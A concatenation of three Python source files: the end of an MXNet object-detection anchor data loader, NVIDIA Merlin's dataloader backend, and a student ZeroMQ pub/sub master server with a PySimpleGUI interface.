im_info = input_record["im_info"]
gt_bbox = input_record["gt_bbox"]
assert isinstance(gt_bbox, np.ndarray)
assert gt_bbox.dtype == np.float32
assert gt_bbox.shape[1] == 5
valid = np.where(gt_bbox[:, 0] != -1)[0]
gt_bbox = gt_bbox[valid]
gt_class = gt_bbox[:, -1].copy()
gt_bbox = gt_bbox[:, :4].copy()
cls_label = None
anchor_label = None
valid_index, valid_anchor = self._gather_valid_anchor(im_info)
if p.generate.use_groupsoftmax:
gt_class = p.gtclass2rpn(gt_class)
cls_label, anchor_label = \
self._assign_label_to_anchor_group(valid_anchor, gt_bbox, gt_class,
p.assign.neg_thr, p.assign.pos_thr, p.assign.min_pos_thr)
else:
cls_label, anchor_label = \
self._assign_label_to_anchor(valid_anchor, gt_bbox,
p.assign.neg_thr, p.assign.pos_thr, p.assign.min_pos_thr)
self._sample_anchor(cls_label, p.sample.image_anchor, p.sample.pos_fraction)
reg_target, reg_weight = self._cal_anchor_target(cls_label, valid_anchor, gt_bbox, anchor_label)
cls_label, reg_target, reg_weight = \
self._scatter_valid_anchor(valid_index, cls_label, reg_target, reg_weight)
h, w = im_info[:2]
if h >= w:
fh, fw = p.generate.long, p.generate.short
else:
fh, fw = p.generate.short, p.generate.long
input_record["rpn_cls_label"] = cls_label.reshape((fh, fw, -1)).transpose(2, 0, 1).reshape(-1)
input_record["rpn_reg_target"] = reg_target.reshape((fh, fw, -1)).transpose(2, 0, 1)
input_record["rpn_reg_weight"] = reg_weight.reshape((fh, fw, -1)).transpose(2, 0, 1)
return input_record["rpn_cls_label"], \
input_record["rpn_reg_target"], \
input_record["rpn_reg_weight"]
class RenameRecord(DetectionAugmentation):
def __init__(self, mapping):
super().__init__()
self.mapping = mapping
def apply(self, input_record):
for k, new_k in self.mapping.items():
input_record[new_k] = input_record[k]
del input_record[k]
class Loader(mx.io.DataIter):
"""
Loader is now a 3-thread design,
Loader.next is called in the main thread,
multiple worker threads are responsible for performing transform,
a collector thread is responsible for converting numpy array to mxnet array.
"""
def __init__(self, roidb, transform, data_name, label_name, batch_size=1,
shuffle=False, num_worker=None, num_collector=None,
worker_queue_depth=None, collector_queue_depth=None, kv=None, valid_count=-1):
"""
This Iter will provide roi data to Fast R-CNN network
:param roidb: must be preprocessed
:param batch_size:
:param shuffle: bool
:return: Loader
"""
super().__init__(batch_size=batch_size)
if kv:
(self.rank, self.num_worker) = (kv.rank, kv.num_workers)
else:
(self.rank, self.num_worker) = (0, 1)
# data processing utilities
if isinstance(transform, dict):
self.transform = transform["sample"]
self.batch_transform = transform["batch"]
else:
self.transform = transform
self.batch_transform = list()
# save parameters as properties
self.roidb = roidb
self.shuffle = shuffle
# infer properties from roidb
self.total_index = np.arange(len(roidb))
self.valid_count = valid_count if valid_count != -1 else len(roidb)
# decide data and label names
self.data_name = data_name
self.label_name = label_name
# status variable for synchronization between get_data and get_label
self._cur = 0
self.data = None
self.label = None
self.debug = False
self.result = None
# multi-thread settings
self.num_worker = num_worker
self.num_collector = num_collector
self.index_queue = Queue()
self.data_queue = Queue(maxsize=worker_queue_depth)
self.result_queue = Queue(maxsize=collector_queue_depth)
self.workers = None
self.collectors = None
# get first batch to fill in provide_data and provide_label
self._thread_start()
self.load_first_batch()
self.reset()
@property
def index(self):
return self.total_index[:self.valid_count]
@property
def total_record(self):
return len(self.index) // self.batch_size * self.batch_size
@property
def provide_data(self):
return [(k, v.shape) for k, v in zip(self.data_name, self.data)]
@property
def provide_label(self):
return [(k, v.shape) for k, v in zip(self.label_name, self.label)]
def _insert_queue(self):
for i in range(0, len(self.index), self.batch_size):
batch_index = self.index[i:i + self.batch_size]
if len(batch_index) == self.batch_size:
self.index_queue.put(batch_index)
def _thread_start(self):
self.workers = \
[Thread(target=self.worker, args=[self.roidb, self.index_queue, self.data_queue])
for _ in range(self.num_worker)]
for worker in self.workers:
worker.daemon = True
worker.start()
self.collectors = [Thread(target=self.collector, args=[]) for _ in range(self.num_collector)]
for c in self.collectors:
c.daemon = True
c.start()
def reset(self):
self._cur = 0
if self.shuffle:
np.random.shuffle(self.total_index)
self._insert_queue()
def iter_next(self):
return self._cur + self.batch_size <= len(self.index)
def load_first_batch(self):
self.index_queue.put(range(self.batch_size))
self.next()
def load_batch(self):
self._cur += self.batch_size
result = self.result_queue.get()
return result
def next(self):
if self.debug and self.result is not None:
return self.result
if self.iter_next():
# print("[worker] %d" % self.data_queue.qsize())
# print("[collector] %d" % self.result_queue.qsize())
result = self.load_batch()
self.data = result.data
self.label = result.label
self.result = result
return result
else:
raise StopIteration
def worker(self, roidb, index_queue, data_queue):
while True:
batch_index = index_queue.get()
records = []
for index in batch_index:
roi_record = roidb[index].copy()
for trans in self.transform:
trans.apply(roi_record)
records.append(roi_record)
data_batch = {}
for name in self.data_name + self.label_name:
data_batch[name] = np.ascontiguousarray(np.stack([r[name] for r in records]))
for trans in self.batch_transform:
trans.apply(data_batch)
data_queue.put(data_batch)
def collector(self):
while True:
record = self.data_queue.get()
data = [mx.nd.from_numpy(record[name], zero_copy=True) for name in self.data_name]
label = [mx.nd.from_numpy(record[name], zero_copy=True) for name in self.label_name]
provide_data = [(k, v.shape) for k, v in zip(self.data_name, data)]
provide_label = [(k, v.shape) for k, v in zip(self.label_name, label)]
data_batch = mx.io.DataBatch(data=data,
label=label,
provide_data=provide_data,
provide_label=provide_label)
self.result_queue.put(data_batch)
class SequentialLoader(mx.io.DataIter):
def __init__(self, iters):
super().__init__()
self.iters = iters
self.exhausted = [False] * len(iters)
def __getattr__(self, attr):
# delegate unknown keys to underlying iterators
first_non_empty_idx = self.exhausted.index(False)
first_non_empty_iter = self.iters[first_non_empty_idx]
return getattr(first_non_empty_iter, attr)
def next(self):
while True:
if all(self.exhausted):
raise StopIteration
first_non_empty_idx = self.exhausted.index(False)
first_non_empty_iter = self.iters[first_non_empty_idx]
try:
result = first_non_empty_iter.next()
return result
except StopIteration:
self.exhausted[first_non_empty_idx] = True
def reset(self):
for it in self.iters:
it.reset()
self.exhausted = [False] * len(self.iters)
@property
def provide_data(self):
return self.iters[0].provide_data
@property
def provide_label(self):
return self.iters[0].provide_label
class AnchorLoader(mx.io.DataIter):
def __init__(self, roidb, transform, data_name, label_name, batch_size=1,
shuffle=False, num_worker=12, num_collector=4, worker_queue_depth=4,
collector_queue_depth=4, kv=None):
super().__init__(batch_size=batch_size)
v_roidb, h_roidb = self.roidb_aspect_group(roidb)
if kv:
rank, num_rank = kv.rank, kv.num_workers
else:
rank, num_rank = 0, 1
if num_rank > 1:
v_part = len(v_roidb) // num_rank
v_remain = len(v_roidb) % num_rank
v_roidb_part = v_roidb[rank * v_part:(rank + 1) * v_part]
v_valid_count = len(v_roidb_part)
v_roidb_part += v_roidb[-v_remain:][rank:rank+1]
h_part = len(h_roidb) // num_rank
h_remain = len(h_roidb) % num_rank
h_roidb_part = h_roidb[rank * h_part:(rank + 1) * h_part]
h_valid_count = len(h_roidb_part)
h_roidb_part += h_roidb[-h_remain:][rank:rank+1]
else:
v_roidb_part = v_roidb
v_valid_count = len(v_roidb)
h_roidb_part = h_roidb
h_valid_count = len(h_roidb)
loaders = []
if len(h_roidb_part) >= batch_size:
h_loader = Loader(roidb=h_roidb_part,
valid_count=h_valid_count,
transform=transform,
data_name=data_name,
label_name=label_name,
batch_size=batch_size,
shuffle=shuffle,
num_worker=num_worker,
num_collector=num_collector,
worker_queue_depth=worker_queue_depth,
collector_queue_depth=collector_queue_depth,
kv=kv)
loaders.append(h_loader)
if len(v_roidb_part) >= batch_size:
v_loader = Loader(roidb=v_roidb_part,
valid_count=v_valid_count,
transform=transform,
data_name=data_name,
label_name=label_name,
batch_size=batch_size,
shuffle=shuffle,
num_worker=num_worker,
num_collector=num_collector,
worker_queue_depth=worker_queue_depth,
collector_queue_depth=collector_queue_depth,
kv=kv)
loaders.append(v_loader)
assert len(loaders) > 0, "at least one loader should be constructed"
self.__loader = SequentialLoader(loaders)
@property
def total_record(self):
return sum([it.total_record for it in self.__loader.iters])
def __len__(self):
return self.total_record
def __getattr__(self, attr):
# delegate unknown keys to underlying iterators
return getattr(self.__loader, attr)
def next(self):
return self.__loader.next()
def reset(self):
return self.__loader.reset()
@staticmethod
def roidb_aspect_group(roidb):
v_roidb, h_roidb = [], []
for roirec in roidb:
if roirec["h"] >= roirec["w"]:
v_roidb.append(roirec)
else:
h_roidb.append(roirec)
return v_roidb, h_roidb
def visualize_anchor_loader(batch_data):
image = batch_data.data[0][0].asnumpy().astype(np.uint8).transpose((1, 2, 0)).copy()
gt_bbox = batch_data.data[2][0].asnumpy().astype(np.int32)
for box in gt_bbox:
cv2.rectangle(image, tuple(box[:2]), tuple(box[2:4]), color=(0, 255, 0))
cv2.imshow("image", image)
cv2.waitKey()
def visualize_anchor_loader_old(batch_data):
image = batch_data.data[0][0].asnumpy().astype(np.uint8).transpose((1, 2, 0)).copy()
gt_bbox = batch_data.label[3][0].asnumpy().astype(np.int32)
for box in gt_bbox:
cv2.rectangle(image, tuple(box[:2]), tuple(box[2:4]), color=(0, 255, 0))
cv2.imshow("image", image)
cv2.waitKey()
def visualize_original_input(roirec):
image = cv2.imread(roirec["image_url"], cv2.IMREAD_COLOR)
gt_bbox = roirec["gt_bbox"]
for box in gt_bbox:
cv2.rectangle(image, tuple(box[:2]), tuple(box[2:4]), color=(0, 255, 0))
cv2.imshow("image", image)
cv2.waitKey()
|
backend.py | #
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import math
import queue
import threading
import warnings
from collections import OrderedDict
import numpy as np
try:
import cupy as cp
except ImportError:
cp = np
from merlin.core.dispatch import (
HAS_GPU,
annotate,
concat,
generate_local_seed,
is_list_dtype,
make_df,
pull_apart_list,
)
from merlin.io.shuffle import shuffle_df
from merlin.models.loader.dataframe_iter import DataFrameIter
from merlin.schema import Tags
def _num_steps(num_samples, step_size):
return math.ceil(num_samples / step_size)
class ChunkQueue:
"""This class takes partitions (parts) from an NVTabular dataset
and concatenates them into a cudf dataframe "chunk". This chunk
is subsequently transformed into its tensor representation using
the iterator's transform.
Parameters
-----------
qsize: int
Max number of elements to hold in the buffer at once
num_parts : int
number of partitions from the iterator, an NVTabular Dataset to concatenate into a "chunk"
shuffle : bool
enable/disable chunk-level shuffling
put_wait: float
amount of timeout to wait for a full queue to open up
before checking for errors and trying again
"""
def __init__(self, dataloader, qsize, num_parts=1, shuffle=False, put_wait=1e-6, epochs=1):
self.num_parts = num_parts
self.shuffle = shuffle
self.put_wait = put_wait
self.q_out = queue.Queue(qsize)
self._stop_event = threading.Event()
self.itr = dataloader._data_iter(epochs)
self.dataloader = dataloader
def __len__(self):
return len(self.itr)
@property
def stopped(self):
return self._stop_event.is_set()
@property
def empty(self):
return self.q_out.empty()
def get(self):
return self.q_out.get()
def put(self, packet):
while True:
if self.stopped:
return True
try:
self.q_out.put(packet, timeout=self.put_wait)
return False
except queue.Full:
continue
@annotate("batch", color="darkgreen", domain="nvt_python")
def batch(self, itr):
"""
iterates through gpu_mem_frac size chunks of dataset
and concatenates every `num_parts` of them.
"""
current = []
while True:
try:
value = next(itr)
except StopIteration:
if len(current) > 0:
yield current
break
current.append(value)
if len(current) == self.num_parts:
yield current
current = []
@annotate("chunk_logic", color="darkgreen", domain="nvt_python")
def chunk_logic(self, itr):
spill = None
for chunks in self.batch(itr):
if self.stopped:
return
if spill is not None and not spill.empty:
chunks.insert(0, spill)
chunks = concat(chunks)
chunks.reset_index(drop=True, inplace=True)
chunks, spill = self.get_batch_div_chunk(chunks, self.dataloader.batch_size)
if self.shuffle:
chunks = shuffle_df(chunks)
if len(chunks) > 0:
chunks = self.dataloader.make_tensors(chunks, self.dataloader._use_nnz)
# put returns True if buffer is stopped before
# packet can be put in queue. Keeps us from
# freezing on a put on a full queue
if self.put(chunks):
return
chunks = None
# takes care final batch, which is less than batch size
if not self.dataloader.drop_last and spill is not None and not spill.empty:
spill = self.dataloader.make_tensors(spill, self.dataloader._use_nnz)
self.put(spill)
@annotate("load_chunks", color="darkgreen", domain="nvt_python")
def load_chunks(self, dev):
try:
itr = iter(self.itr)
if self.dataloader.device != "cpu":
with self.dataloader._get_device_ctx(dev):
self.chunk_logic(itr)
else:
self.chunk_logic(itr)
except Exception as e: # pylint: disable=broad-except
self.put(e)
# For when an iterator is stopped before iteration is complete.
def stop(self):
self._stop_event.set()
# TODO: should we be clearing? I can imagine a world where
# you want the thread to stop but still want to grab
# data out of the buffer
self.q_out.queue.clear()
def start(self):
self._stop_event.clear()
def get_batch_div_chunk(self, chunks, batch_size):
# TODO: is there a way to do this using cupy?
spill_idx = int(chunks.shape[0] / batch_size) * batch_size
spill = make_df(chunks.iloc[spill_idx:])
chunks = make_df(chunks.iloc[:spill_idx])
if not chunks.empty:
chunks.reset_index(drop=True, inplace=True)
if not spill.empty:
spill.reset_index(drop=True, inplace=True)
return chunks, spill
def _get_dataset_schema(dataset):
return dataset.schema if hasattr(dataset, "schema") else None
# TODO: implement as metaclass and assign methods to children
# to avoid having to do Dataset.<method> calls?
class DataLoader:
_use_nnz = False
def __init__(
self,
dataset,
batch_size,
shuffle,
cat_names=None,
cont_names=None,
label_names=None,
seed_fn=None,
parts_per_chunk=1,
device=None,
global_size=None,
global_rank=None,
drop_last=False,
sparse_names=None,
sparse_max=None,
sparse_as_dense=False,
):
self.data = dataset
self.schema = _get_dataset_schema(dataset)
# self.data is ddf format
self.indices = cp.arange(self.data.npartitions)
self.drop_last = drop_last
self.device = (device or 0) if HAS_GPU else "cpu"
self.sparse_names = sparse_names or []
self.sparse_max = sparse_max or {}
self.sparse_as_dense = sparse_as_dense
self.global_size = global_size or 1
self.global_rank = global_rank or 0
self._epochs = 1
self.cat_names = cat_names or (
self.schema.select_by_tag(Tags.CATEGORICAL).excluding_by_tag(Tags.TARGET).column_names
if self.schema
else []
)
self.cont_names = cont_names or (
self.schema.select_by_tag(Tags.CONTINUOUS).excluding_by_tag(Tags.TARGET).column_names
if self.schema
else []
)
self.label_names = label_names or (
self.schema.select_by_tag(Tags.TARGET).column_names if self.schema else []
)
if not self.cat_names and not self.cont_names:
raise ValueError(
"Neither Categorical or Continuous columns were found by the dataloader. "
"You must either specify the cat_names, cont_names and "
"label_names properties or supply a schema.pbtxt file in dataset directory."
)
self.batch_size = batch_size
self.shuffle = shuffle
self.seed_fn = seed_fn
self.num_rows_processed = 0
self.parts_per_chunk = parts_per_chunk
self.shuffle = shuffle
self.__buff = None
self.__buff_len = None
self._batch_itr = None
self._workers = None
@property
def _buff(self):
if self.__buff is None:
# we set size of chunk queue to 1 we only want one chunk in queue at a time.
self.__buff = ChunkQueue(
self, 1, num_parts=self.parts_per_chunk, shuffle=self.shuffle, epochs=self._epochs
)
return self.__buff
@property
def _buff_len(self):
if self.__buff_len is None:
# run once instead of every time len called
self.__buff_len = len(self._buff)
return self.__buff_len
def epochs(self, epochs=1):
if epochs == self._epochs:
return self
new_dataloader = copy.copy(self)
new_dataloader._set_epochs(epochs)
return new_dataloader
def _set_epochs(self, epochs):
self.stop()
self.__buff = None
self.__buff_len = None
self._epochs = epochs
def __len__(self):
batches = _num_steps(self._buff_len, self.batch_size)
if self.drop_last and self._buff_len % self.batch_size > 0:
batches = batches - 1
return batches
@property
def _working(self):
if self._workers is not None:
return any(t.is_alive() for t in self._workers)
return False
def stop(self):
# TODO: raise warning or even error if condition
# isn't met?
if self._workers is not None:
if not self._buff.stopped:
self._buff.stop()
for t in self._workers:
t.join()
# remove joined threads from list
self._workers = None
self._buff.q_out.queue.clear()
self._batch_itr = None
def _gather_indices_for_dev(self, dev):
# this should be self.indices divided by total processes, global set
if len(self.indices) < self.global_size:
warnings.warn(
f"""You have more processes({self.global_size}) than dataset
partitions({len(self.indices)}), reduce the number of processes."""
)
raise IndexError
per_worker = _num_steps(len(self.indices), self.global_size)
# identify process rank out of all processes (not local rank)
start = self.global_rank * per_worker
return self.indices[start : start + per_worker].tolist()
@annotate("_shuffle_indices", color="darkgreen", domain="nvt_python")
def _shuffle_indices(self):
generate_local_seed(self.global_rank, self.global_size)
if self.seed_fn:
new_seed = self.seed_fn()
cp.random.seed(new_seed)
cp.random.shuffle(self.indices)
generate_local_seed(self.global_rank, self.global_size)
def __iter__(self):
self.stop()
self.num_rows_processed = 0
if self._buff.stopped:
self._buff.start()
# shuffle partition indices to bring disparate
# parts of the dataset "close" to one another
if self.shuffle:
self._shuffle_indices()
# build and start new threads for loading and
# concatenating data
self._workers = []
t = threading.Thread(target=self._buff.load_chunks, args=(self.device,))
t.daemon = True
t.start()
self._workers.append(t)
return self
def __next__(self):
return self._get_next_batch()
def _data_iter(self, epochs):
indices = self._gather_indices_for_dev(0)
if hasattr(self.data, "to_iter"):
return self.data.to_iter(indices=indices, epochs=epochs)
return DataFrameIter(self.data, epochs=epochs)
def _fetch_chunk(self):
chunks = self._buff.get()
if isinstance(chunks, Exception):
self.stop()
raise chunks
self._batch_itr = iter(chunks)
def _get_next_batch(self):
"""
adding this cheap shim so that we can call this
step without it getting overridden by the
framework-specific parent class's `__next__` method.
TODO: can this be better solved with a metaclass
implementation? My gut is that we don't actually
necessarily *want*, in general, to be overriding
__next__ and __iter__ methods
"""
# we've never initialized, do that now
# need this because tf.keras.Model.fit will
# call next() cold
if self._workers is None:
DataLoader.__iter__(self)
# get the first chunks
if self._batch_itr is None:
self._fetch_chunk()
# try to iterate through existing batches
try:
batch = next(self._batch_itr)
except StopIteration:
# anticipate any more chunks getting created
# if not, raise the StopIteration
if not self._working and self._buff.empty:
self._workers = None
self._batch_itr = None
raise
# otherwise get the next chunks and return
# the first batch
self._fetch_chunk()
batch = next(self._batch_itr)
# if batch[0] is empty but other exist
for sub in batch:
if sub is not None and len(sub) > 0:
self.num_rows_processed += len(sub)
break
return batch
@annotate("make_tensors", color="darkgreen", domain="nvt_python")
def make_tensors(self, gdf, use_nnz=False):
split_idx = self._get_segment_lengths(len(gdf))
# map from big chunk to framework-specific tensors
chunks = self._create_tensors(gdf)
# if we have any offsets, calculate nnzs up front
if len(chunks) == 4:
offsets = chunks[-1]
if use_nnz:
nnzs = offsets[1:] - offsets[:-1]
chunks = chunks[:-1]
# split them into batches and map to the framework-specific output format
batches = [[] for _ in range(len(split_idx))]
offset_idx = 0
for chunk in chunks:
lists = None
if isinstance(chunk, tuple):
chunk, lists = chunk
if len(split_idx) > 1 and chunk is not None:
chunk = self._split_fn(chunk, split_idx)
else:
chunk = [chunk for _ in split_idx]
if lists is not None:
num_list_columns = len(lists)
# grab the set of offsets and nnzs corresponding to
# the list columns from this chunk
chunk_offsets = offsets[:, offset_idx : offset_idx + num_list_columns]
if use_nnz:
chunk_nnzs = nnzs[:, offset_idx : offset_idx + num_list_columns]
offset_idx += num_list_columns
# split them into batches, including an extra 1 on the offsets
# so we know how long the very last element is
batch_offsets = self._split_fn(chunk_offsets, split_idx + [1])
if use_nnz and len(split_idx) > 1:
batch_nnzs = self._split_fn(chunk_nnzs, split_idx)
elif use_nnz:
batch_nnzs = [chunk_nnzs]
else:
batch_nnzs = [None] * (len(batch_offsets) - 1)
# group all these indices together and iterate through
# them in batches to grab the proper elements from each
# values tensor
chunk = zip(chunk, batch_offsets[:-1], batch_offsets[1:], batch_nnzs)
for n, c in enumerate(chunk):
if isinstance(c, tuple):
c, off0s, off1s, _nnzs = c
offsets_split_idx = [1 for _ in range(num_list_columns)]
off0s = self._split_fn(off0s, offsets_split_idx, axis=1)
off1s = self._split_fn(off1s, offsets_split_idx, axis=1)
if use_nnz:
_nnzs = self._split_fn(_nnzs, offsets_split_idx, axis=1)
# TODO: does this need to be ordereddict?
batch_lists = {}
for k, (column_name, values) in enumerate(lists.items()):
off0, off1 = off0s[k], off1s[k]
if use_nnz:
nnz = _nnzs[k]
# need to grab scalars for TF case
if len(off0.shape) == 1:
start, stop = off0[0], off1[0]
elif len(off0.shape) == 2:
start, stop = off0[0, 0], off1[0, 0]
else:
print(off0, off1)
raise ValueError
value = values[int(start) : int(stop)]
index = off0 - start if not use_nnz else nnz
batch_lists[column_name] = (value, index)
c = (c, batch_lists)
batches[n].append(c)
return [self._handle_tensors(*batch) for batch in batches]
def _get_segment_lengths(self, num_samples):
"""
Helper function to build indices to pass
to <torch|tf>.split functions for breaking
up into batches
"""
num_full_batches = _num_steps(num_samples, self.batch_size) - 1
idx = [self.batch_size for _ in range(num_full_batches)]
idx.append(num_samples - num_full_batches * self.batch_size)
return idx
def _to_sparse_tensor(self, values_offset, column_name):
"""
Create a sparse representation of the input tensor.
values_offset is either a tensor or a tuple of tensor, offset.
"""
seq_limit = self.sparse_max[column_name]
values, offsets, diff_offsets, num_rows = self._pull_values_offsets(values_offset)
max_seq_len = self._get_max_seq_len(diff_offsets)
if max_seq_len > seq_limit:
raise ValueError(
"The default sequence length has been configured "
+ f"to {seq_limit} but the "
+ f"largest sequence in this batch have {max_seq_len} length"
)
return self._build_sparse_tensor(values, offsets, diff_offsets, num_rows, seq_limit)
def _to_tensor(self, gdf, dtype=None):
"""
One of the mandatory functions a child class needs
to implement. Maps from a cudf DataFrame to a
tensor in the appropriate library, with an optional
dtype kwarg to do explicit casting if need be
"""
raise NotImplementedError
def _get_device_ctx(self, dev):
"""
One of the mandatory functions a child class needs
to implement. Maps from a GPU index to a framework
context object for placing tensors on specific GPUs
"""
raise NotImplementedError
def _split_fn(self, tensor, idx, axis=0):
raise NotImplementedError
@property
def _LONG_DTYPE(self):
raise NotImplementedError
@property
def _FLOAT32_DTYPE(self):
raise NotImplementedError
def _separate_list_columns(self, gdf):
lists, scalars = [], []
for col in gdf.columns:
if is_list_dtype(gdf[col]):
lists.append(col)
else:
scalars.append(col)
return scalars, lists
@annotate("_create_tensors", color="darkgreen", domain="nvt_python")
def _create_tensors(self, gdf):
"""
Breaks a dataframe down into the relevant
categorical, continuous, and label tensors.
Can be overrideen
"""
workflow_nodes = (self.cat_names, self.cont_names, self.label_names)
dtypes = (self._LONG_DTYPE, self._FLOAT32_DTYPE, self._FLOAT32_DTYPE)
tensors = []
offsets = make_df(device=self.device)
for column_names, dtype in zip(workflow_nodes, dtypes):
if len(column_names) == 0:
tensors.append(None)
continue
if hasattr(column_names, "column_names"):
column_names = column_names.column_names
gdf_i = gdf[column_names]
gdf.drop(columns=column_names, inplace=True)
scalars, lists = self._separate_list_columns(gdf_i)
x = None
if scalars:
# should always return dict column_name: values, offsets (optional)
x = self._to_tensor(gdf_i[scalars], dtype)
if lists:
list_tensors = OrderedDict()
for column_name in lists:
column = gdf_i.pop(column_name)
leaves, col_offsets = pull_apart_list(column)
if isinstance(leaves[0], list):
leaves, nest_offsets = pull_apart_list(leaves)
col_offsets = nest_offsets.iloc[col_offsets[:]]
offsets[column_name] = col_offsets.reset_index(drop=True)
list_tensors[column_name] = self._to_tensor(leaves, dtype)
x = x, list_tensors
tensors.append(x)
if not offsets.empty:
offsets_tensor = self._to_tensor(offsets, self._LONG_DTYPE)
if len(offsets_tensor.shape) == 1:
offsets_tensor = offsets_tensor[:, None]
tensors.append(offsets_tensor)
del gdf, offsets
return tensors
@annotate("_handle_tensors", color="darkgreen", domain="nvt_python")
def _handle_tensors(self, cats, conts, labels):
X = {}
for tensor, names in zip([cats, conts], [self.cat_names, self.cont_names]):
lists = {}
if isinstance(tensor, tuple):
tensor, lists = tensor
names = [i for i in names if i not in lists]
# now add in any scalar tensors
if len(names) > 1:
tensors = self._tensor_split(tensor, len(names), axis=1)
lists.update(zip(names, tensors))
elif len(names) == 1:
lists[names[0]] = tensor
X.update(lists)
for column_name in X:
if column_name in self.sparse_names:
if column_name not in self.sparse_max:
raise ValueError(
f"Did not convert {column_name} to sparse due to missing sparse_max entry"
)
X[column_name] = self._to_sparse_tensor(X[column_name], column_name)
# TODO: use dict for labels as well?
# would require output layers to match naming
if len(self.label_names) > 1:
labels = self._tensor_split(labels, len(self.label_names), axis=1)
return X, labels
|
talaMaster.py | #!/usr/bin/env python3
################################################################################
# Author(s): Aladi Akoh, ............
# Professor: Dr. Jeff McGough
# Usage: Start up talaMaster on a terminal using the command:
# ./talaMaster.py
# Start up another terminal and run the client program using the command:
# ./name_of_client.py
################################################################################
import time
import zmq
import threading as thr
from multiprocessing import Process
# Imports from TALA GUI CODE
import PySimpleGUI as sg
import numpy as np
import networkx as nx
import pandas as pd
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import matplotlib.pyplot as plt
################################################################################
# Function to decode received message from client (pub/sub)
################################################################################
def split_message(message):
channel, comm_type = message.split()
return channel, comm_type
################################################################################
# Function to send correct port number to client(pub/sub)
################################################################################
def pack(comm_type,pub_port, sub_port, socket):
# If client is a publisher, send the Forwarder subcriber port number
# If client is a subscriber, send the Forwarder publisher port number
if (comm_type == "PUBLISHER"):
print("Sending port number (", sub_port ,")to client")
socket.send_string(sub_port)
elif (comm_type == "SUBSCRIBER"):
print("Sending port number (", pub_port, ")to client")
socket.send_string(pub_port)
################################################################################
# Function to fire up a forwader based on client's request
################################################################################
def forwader(sub_port, pub_port):
# This code will actually run in a separate process
# And separate context.
try:
context = zmq.Context(1)
# Socket facing clients
frontend = context.socket(zmq.SUB)
frontend.bind("tcp://*:%s" % sub_port)
frontend.setsockopt_string(zmq.SUBSCRIBE, "")
print("Forwader: Frontend subscriber socket initializing...")
# Socket facing services
backend = context.socket(zmq.PUB)
backend.bind("tcp://*:%s" % pub_port)
print("Forwarder: Backend publisher socket initializing...")
zmq.device(zmq.FORWARDER, frontend, backend)
except Exception as e:
print (e)
print ("bringing down zmq device")
################################################################################
# Sever Function here
################################################################################
def serverFunction(mode):
global server_run, data, channel_list, pub_port, sub_port
# Socket to connect to clients
print("Collecting updates from clients...")
context = zmq.Context()
master_reply = context.socket(zmq.REP)
# Get the master port number from the main function & bind
master_reply.bind("tcp://*:" + str(data[0]))
# Initialize the port number for clients(pub/sub)
port = data[1]
while (server_run):
# Wait for request from client(pub/sub) node
try:
message = master_reply.recv_string(flags = zmq.NOBLOCK)
except zmq.Again as e:
continue
# Call the split_message function here to decode message from client
channel, key = split_message(message)
channel_name = channel
comm_type = key
# Check/decide what to do if channel exists in dictionary or not
# If channel exists, do not create new port numbers, send the existing
# Port numbers back to the client depending on the communication type
if(channel_name in channel_list):
pub_port = channel_list[channel_name][0]
sub_port = channel_list[channel_name][1]
print ("Ports exist in dictionary:", pub_port, sub_port)
else:
# Get new port numbers/increment port numbers dynamically
port = str(int(port) + 1)
pub_port = port
port = str(int(port) + 1)
sub_port = port
# Update dictionary/create new pair if it does not exist
channel_list.update( { channel_name: (pub_port, sub_port, comm_type) } )
# Start the forwarder process here for the channel
newchannel = Process(target = forwader, args=(sub_port, pub_port))
newchannel.start()
# Call the Pack function to pack data and send reply back to client
pack(comm_type, pub_port, sub_port, master_reply)
print(channel_list)
################################################################################
# mat plot helper code from PySimpleGUI Github
################################################################################
def draw_figure(canvas, figure, loc=(0, 0)):
figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)
figure_canvas_agg.draw()
figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)
return figure_canvas_agg
################################################################################
# Main Function with the GUI code
################################################################################
def main():
global server_run, data, channel_list, master_port, channel_port_range
global channel_port_base
print("Tala v 3.0")
master_port = data[0]
channel_port_base = data[1]
channel_port_range = data[2]
sg.theme("Purple")
# get figure from plot and extract height and width variables
fig = plt.gcf() # if using Pyplot then get the figure from the plot
figure_x, figure_y, figure_w, figure_h = fig.bbox.bounds
# Minimum functionality behind menu, currently only Exit has functionality
menu_def = [['File', ['Open', 'Save', 'Exit']]]
# Layout contains text, buttons, input, and canvas for graph
layout = [[sg.Menu(menu_def)],
# Row 1
[sg.Text("Master Port"), sg.InputText(master_port, key="masterPort", size=(10,5)),
sg.Text("Channel Port Base"), sg.InputText(channel_port_base, key="channelBase", size=(10,5)),
sg.Text("Channel Port Range"), sg.InputText(channel_port_range, key="channelRange", size=(10,5)),
sg.Button('Load')],
##################################################################
# Node row
# [sg.Text("Node Port Base"), sg.Input(key="nodeBase", size=(10,5)),
# sg.Text("Node Port Range"), sg.Input(key="nodeRange", size=(10,5)),
# sg.Button('Save')],
##################################################################
# row 2
[sg.Text("Tala Server"), sg.Button("Stop"), sg.Button("Start")],
# row 3
[sg.Text("Active Nodes"), sg.Button('Show'), sg.Button('Kill Node'),
sg.Text("Active Channels"), sg.Button('Show'), sg.Button('Kill Channel')],
# row 4
[sg.Input(size=(20,8)), sg.Text(" "), sg.Input(size=(20,8))],
# row 5
[sg.Canvas(size=(figure_w/2, figure_h/2), key='-CANVAS-')]]
window = sg.Window("Tala", layout, force_toplevel=True, finalize=True)
while True:
event, values = window.read()
if event in (None, "Exit"):
server_run = False
break
# global variables being set through read of button presses using index keys
if event == "Load":
# If user decides to provide their own values, clear default vals
data.clear()
master_port = values["masterPort"]
channel_port_base = values["channelBase"]
channel_port_range = values["channelRange"]
# If master port is same as channel port
# Display a pop up error message
if (master_port == channel_port_base):
sg.Popup("Master port cannot be the same with channel port base!")
# TODO: Clear/reset master port and channel port base
# Fill up data array with new values from user
data.append(master_port)
data.append(channel_port_base)
data.append(channel_port_range)
print("Data:", data)
# if event == "Save":
# node_port_base = values["nodeBase"]
# node_port_range = values["nodeRange"]
if event == "Start":
print("Master Server Connecting...")
server_run = True
server_thr = thr.Thread(target=serverFunction, args=(1,))
server_thr.start()
